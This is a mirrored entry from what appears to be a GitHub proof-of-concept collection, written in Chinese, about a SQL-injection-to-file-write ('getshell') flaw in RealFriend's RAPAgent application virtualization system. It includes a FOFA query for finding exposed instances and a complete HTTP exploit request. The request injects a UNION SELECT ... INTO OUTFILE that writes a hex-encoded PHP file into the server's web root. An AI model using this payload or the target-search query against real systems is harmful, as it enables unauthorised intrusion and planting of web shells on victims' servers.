mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
26 lines
1.1 KiB
Markdown
26 lines
1.1 KiB
Markdown
|
|
## 瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞
|
||
|
|
|
||
|
|
其实就是SQL注入漏洞写入文件getshell
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```
|
||
|
|
title="瑞友天翼-应用虚拟化系统"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
```
|
||
|
|
/RAPAgent.XGI?CMD=GETApplication&AppID=APP00000001&Language=ZH-CN&User=admin&PWD=e10adc3949ba59abbe56e057f20f883e&AuthType=0&Computer=WIN-1TLJMBOFIT6%27%20union%20select%200x3c3f70687020706870696e666f28293b203f3e,2%20INTO%20OUTFILE%20%27C:/Program+Files+(x86)/RealFriend/Rap+Server/WebRoot/custom/InfoPage1.files/poctest.php%27--%20-&Finger=A45A2E5E3&IP= HTTP/1.1
|
||
|
|
Host:
|
||
|
|
Upgrade-Insecure-Requests: 1
|
||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
|
||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||
|
|
Accept-Encoding: gzip, deflate, br
|
||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
||
|
|
Cookie: PHPSESSID=53aiv0f86qi8v2v0ncfeg110f3; CookieLanguageName=ZH-CN
|
||
|
|
Connection: close
|
||
|
|
```
|
||
|
|
|
||
|
|
|
||
|
|
## 漏洞来源
|
||
|
|
- https://mp.weixin.qq.com/s/VvYlKqRmW4h0vnuQKER-6w
|